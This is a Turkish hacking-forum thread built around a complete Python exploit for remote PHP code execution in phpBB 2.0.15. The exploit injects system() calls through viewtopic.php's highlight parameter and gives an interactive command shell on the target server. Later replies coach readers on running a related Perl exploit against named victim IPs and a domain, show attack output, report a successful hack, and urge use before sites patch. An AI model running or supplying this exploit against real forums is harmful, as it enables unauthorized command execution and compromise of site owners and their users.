folder Tahribat.com Forumları
linefolder Bilişim Güvenliği
linefolder Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit



Phpbb 2.0.15 "Viewtopic.Php" Remote PHP Code Execution Exploit

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ir2
    ir2's avatar
    Bilgi/Destek Madalyası Developer Madalyası
    Kayıt Tarihi: 10/Mayıs/2003
    Erkek

    bununla phpBB 2.0.15 versionlu forumlarda PHP kodu çalıştırabilirsiniz

    #!/usr/bin/pyth0n

    print "\nphpBB 2.0.15 arbitrary command execution eXploit"
    print " 2005 by rattle@awarenetwork.org"
    print " well, just because there is none."

    import sys
    from urllib2 import Request, urlopen
    from urlparse import urlparse, urlunparse
    from urllib import quote as quote_plus

    INITTAG = '<g0>'
    ENDTAG = '</g0>'

    def makecmd(cmd):
    return reduce(lambda x,y: x+'.chr(%d)'%ord(y),cmd[1:],'chr(%d)'%ord(cmd[0]))


    _ex = "%sviewtopic.php?t=%s&highlight=%%27."
    _ex += "printf(" + makecmd(INITTAG) + ").system(%s)."
    _ex += "printf(" + makecmd(ENDTAG) + ").%%27"


    def usage():
    print """Usage: %s <forum> <topic>

    forum - fully qualified url to the forum
    example: http://www.host.com/phpBB/

    topic - ID of an existing topic. Well you
    will have to check yourself.

    """[:-1] % sys.argv[0]; sys.exit(1)


    if __name__ == '__main__':

    if len(sys.argv) < 3 or not sys.argv[2].isdigit():
    usage()
    else:
    print
    url = sys.argv[1]
    if url.count("://") == 0:
    url = "http://" + url
    url = list(urlparse(url))
    host = url[1]
    if not host: usage()

    if not url[0]: url[0] = 'http'
    if not url[2]: url[2] = '/'
    url[3] = url[4] = url[5] = ''

    url = urlunparse(url)
    if url[-1] != '/': url += '/'

    topic = quote_plus((sys.argv[2]))

    while 1:

    try:
    cmd = raw_input("[%s]$ " % host).strip()
    if cmd[-1]==';': cmd=cmd[:-1]

    if (cmd == "exit"): break
    else: cmd = makecmd(cmd)

    out = _ex % (url,topic,cmd)

    try: ret = urlopen(Request(out)).read()
    except KeyboardInterrupt: continue
    except: pass

    else:
    ret = ret.split(INITTAG,1)
    if len(ret)>1: ret = ret[1].split(ENDTAG,1)
    if len(ret)>1:
    ret = ret[0].strip();
    if ret: print ret
    continue;

    print "EXPLOIT FAILED"

    except:
    continue

     

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ManiaC
    ManiaC's avatar
    Kayıt Tarihi: 07/Mart/2005
    Erkek
    interpreter'a dikkat sistemde pyth0n olması lazım. çaliştırabilmek için.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    HolyDemon
    HolyDemon's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    hımms
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    tagext
    tagext's avatar
    Üstün Hizmet Madalyası Başarı Madalyası
    Kayıt Tarihi: 25/Temmuz/2002
    Erkek
    bu php php nuke bunların patchlerini indirin içinde yazıyor nerde ne eksik olduğu

    ftw
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek

    S.a
    Exploit Calısıyor.Herhangi bir hata ile karsılamasmadım

    örn kullanım:"perl phpbbSecureD.pl 66.118.142.80 /httpdocs/ 80" sekinde calıstırabilirsinz

    Kurban Site Ipsi: 66.118.142.80
    PhpBB nin bulundugu dizin: /httpdocs/
    Saldırılacak Port: 80

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek

    ben perl/bin dizinine exploiti "phpbbSecureD.pl" şeklinde kaydetim perli açıp alttaki kod satırını yazdım ama kabul etmedi. Site örnektir..


    perl phpbbSecureD.pl www.akvadi.com /akvadi/ 80


    Semicolon seems to be missing hatası veriyor neyi yanlış yapıyorum?


    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    Domain Adresini degil Sitenin Ip Adresini yazman gerekiyor
     
    ///////////////////
    C:\Perl\bin>perl phpbbSecureD.pl  82.222.180.50 /akvadi/ 80
    +-----------------------------------------------------------
    | PhpBB 2.0.15 Database Authentication Details Exploit |
    | By SecureD gvr.secured<AT>gmail<DOT>com |
    +-----------------------------------------------------------
    [+] Connecting OK
    [+] Sending exploit FAILED
    ///////////////////
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fistandantilus
    Fistandantilus's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    Yine olmadı. Bende eprlin eski versiyonu fln mı var. txt şeklinde oluyor .pl uzantısıyla kaydetsende. Runlamıyor.. Seer hocam PM ye bakar mısın..

    Fakat söyleyin kardeşlerim; insanlığın bir ereği eksikse, eksik değil midir- bizzat kendisi de?
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Seer
    Seer's avatar
    Kayıt Tarihi: 16/Temmuz/2005
    Erkek
    FiSTaNDaNTiLuSDİKKAT:Az ewwel yazmıs oldugum cevapta yanlıslık var
    80 yerine 20 veya 8 Gelicek!!!!!!

    5-6Dk önceki hacked.cok güzel bi sekilde calısıyor

  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Antikky
    Antikky's avatar
    Üstün Hizmet Madalyası Üstün Hizmet Madalyası
    Kayıt Tarihi: 01/Mayıs/2003
    Erkek

    Evet açık çok baba geçmeden millet uyanmadan indirin işte.


    Umursamaz Tavrımın Hastası Olunuz.
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    2PAC
    2PAC's avatar
    Kayıt Tarihi: 29/Temmuz/2005
    Erkek

    bi b.k anlamadm walla.....


     


     


    pro nerde neyi nerde ve nasıl kullanacağız? sanki bunları sadece bilenler kendi aralarında paylaşıyorlarmı  ...yanii..ne bilim hocam öğretmenlik yapacak birileri.....


     


    eğitim şart  dimi ama


    bi ara doldururum
Toplam Hit: 4482 Toplam Mesaj: 23